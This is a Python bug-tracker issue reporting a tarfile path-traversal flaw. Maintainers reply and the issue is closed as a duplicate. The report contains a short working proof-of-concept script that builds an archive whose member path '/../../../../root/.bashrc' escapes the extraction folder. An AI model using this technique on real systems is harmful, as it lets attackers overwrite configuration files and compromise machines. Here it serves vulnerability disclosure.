Created on 2021-09-11 07:45 by xiongpanju, last changed 2021-09-20 06:34 by martin.panter. This issue is now closed.
| Messages (3) | |||
|---|---|---|---|
| msg401631 - (view) | Author: daji ma (xiongpanju) | Date: 2021-09-11 07:45 | |
tarfile missing cross-directory checking, like ../ or ..\, this potentially cause cross-directory decompression.
the exp:
# -*- coding: utf-8 -*-
import tarfile
def extract_tar(file_path, dest_path):
try:
with tarfile.open(file_path, 'r') as src_file:
for info in src_file.getmembers():
src_file.extract(info.name, dest_path)
return True
except (IOError, OSError, tarfile.TarError):
return False
def make_tar():
tar_file=tarfile.open('x.tar.gz','w:gz')
tar_file.add('bashrc', '/../../../../root/.bashrc')
tar_file.list(verbose=True)
tar_file.close()
if __name__ == '__main__':
make_tar()
extract_tar('x.tar.gz', 'xx')
|
|||
| msg401643 - (view) | Author: Eric V. Smith (eric.smith) *  |
Date: 2021-09-11 17:05 | |
This is documented in the tarfile docs: Warning Never extract archives from untrusted sources without prior inspection. It is possible that files are created outside of path, e.g. members that have absolute filenames starting with "/" or filenames with two dots "..". |
|||
| msg402194 - (view) | Author: Martin Panter (martin.panter) * |
Date: 2021-09-20 06:34 | |
Issue 21109 has been open for a while and is the same as this, if I am not mistaken. |
|||
| History | |||
|---|---|---|---|
| Date | User | Action | Args |
| 2021-09-20 06:34:12 | martin.panter | set | status: open -> closed superseder: tarfile: Traversal attack vulnerability nosy: + martin.panter messages: + msg402194 resolution: duplicate stage: resolved |
| 2021-09-11 17:05:24 | eric.smith | set | nosy:
+ eric.smith messages: + msg401643 |
| 2021-09-11 07:45:41 | xiongpanju | create | |